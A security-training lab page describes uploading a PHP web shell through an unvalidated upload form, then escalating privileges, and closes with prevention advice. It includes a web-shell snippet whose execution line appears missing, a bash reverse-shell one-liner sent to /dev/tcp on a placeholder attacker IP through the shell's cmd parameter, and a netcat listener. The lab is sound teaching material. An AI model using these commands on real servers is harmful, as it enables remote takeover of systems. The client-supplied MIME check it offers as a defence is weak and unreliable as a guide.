Network

Web Apps

System

Cloud

Cryptography

IoT

Exercise 38: Abusing Web Shells for Privilege Escalation

by | Jul 12, 2025 | 0 comments

Objective: Learn to exploit a web shell for privilege escalation on a compromised web server, and understand how to secure web servers against such attacks.


Scenario: Web shells are malicious scripts uploaded to a web server to allow attackers to execute arbitrary commands. Once a web shell is deployed, attackers can use it to interact with the server’s file system, extract sensitive information, and escalate privileges. Your task is to deploy and exploit a web shell while implementing measures to secure the server.


Lab Setup

  1. Environment:
    • A web server vulnerable to file upload attacks.
  2. Tools Required:
    • A web shell script (e.g., PHP-based shell).
    • Terminal access for interacting with the web shell.

Lab Steps

Step 1: Deploy a Web Shell

  1. Identify a file upload vulnerability in the web application.
    • Example: An upload form that doesn’t validate file types.
  2. Create a simple PHP web shell: <?php if(isset($_REQUEST['cmd'])) { echo '<pre>'; echo '</pre>'; } ?>
    • Save the file as shell.php.
  3. Upload the web shell to the server using the vulnerable upload form.
  4. Access the uploaded web shell in your browser: http://<target_ip>/uploads/shell.php

Step 2: Interact with the Web Shell

  1. Use the web shell to execute system commands: http://<target_ip>/uploads/shell.php?cmd=ls
    • Replace ls with other commands to explore the server.
  2. Identify sensitive files, such as:
    • Configuration files (e.g., wp-config.php, .env).
    • User credentials or database connections.

Step 3: Escalate Privileges

  1. Search for privilege escalation vectors:
    • Writable cron jobs.
    • Misconfigured file permissions.
    • SUID binaries.
  2. Deploy a reverse shell payload through the web shell: http://<target_ip>/uploads/shell.php?cmd=bash -i >& /dev/tcp/<your_ip>/4444 0>&1
    • Replace <your_ip> and 4444 with your listener’s IP and port.
  3. Set up a listener on your machine: nc -lvnp 4444
  4. Verify the reverse shell connection and check your privileges: whoami

Solution

Explanation:

  • A web shell provides attackers with remote access to a server’s command line.
  • By escalating privileges, attackers can gain root access and compromise the entire server.

Prevention:

  1. Validate File Uploads:
    • Restrict allowed file types using MIME type validation.
    • Example configuration in PHP: $allowed = ['image/jpeg', 'image/png']; if (!in_array($_FILES['file']['type'], $allowed)) { die('Invalid file type.'); }
  2. Disable Dangerous PHP Functions:
    • Disable functions like system, exec, and shell_exec in php.ini: disable_functions = system,exec,shell_exec,passthru
  3. Restrict Directory Permissions:
    • Ensure upload directories cannot execute scripts: chmod -R 750 /var/www/uploads
      • Add a .htaccess file to deny script execution: <FilesMatch ".*\.(php|pl|py|jsp)$"> deny from all </FilesMatch>
  4. Monitor and Log Activity:
    • Use web server logs to detect unusual activity: sudo tail -f /var/log/apache2/access.log
  5. Deploy a Web Application Firewall (WAF):
    • Use tools like ModSecurity to filter malicious requests.

Testing and Verification

  1. Test file upload forms to ensure only allowed file types are accepted.
  2. Attempt to execute scripts in the upload directory to confirm they are blocked.
  3. Monitor logs for evidence of malicious activity.

Reflection

This exercise demonstrates how web shells can be used to compromise a server and escalate privileges. By implementing strong validation, disabling dangerous functions, and monitoring server activity, you can effectively secure web servers against such attacks.

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *